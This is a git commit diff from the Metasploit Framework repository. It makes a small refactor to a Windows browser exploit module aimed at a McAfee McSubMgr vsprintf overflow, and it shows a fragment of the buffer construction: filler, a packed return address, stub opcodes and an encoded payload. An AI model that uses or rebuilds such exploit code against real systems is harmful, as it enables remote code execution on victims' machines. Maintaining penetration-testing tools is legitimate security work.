use exploit base class method
git-svn-id: file:///home/svn/framework3/trunk@5007 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
525319fbd1
commit
c844826266
|
@ -1,5 +1,5 @@
|
|||
##
|
||||
# $Id:$
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
|
|
|
@ -88,9 +88,9 @@ class Exploits::Windows::Browser::McAfeeMcSubMgrVsprintf < Msf::Exploit::Remote
|
|||
rand_text(2972, payload_badchars) +
|
||||
[ ret ].pack('V') +
|
||||
"\x60" + # pusha
|
||||
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + rand_char(payload_badchars) + # push byte 0x1
|
||||
"\x6a" + rand_char + # push byte 0x1
|
||||
"\x6a" + rand_char + # push byte 0x1
|
||||
"\x6a" + rand_char + # push byte 0x1
|
||||
"\x61" + # popa
|
||||
p.encoded
|
||||
|
||||
|
|
Loading…
Reference in New Issue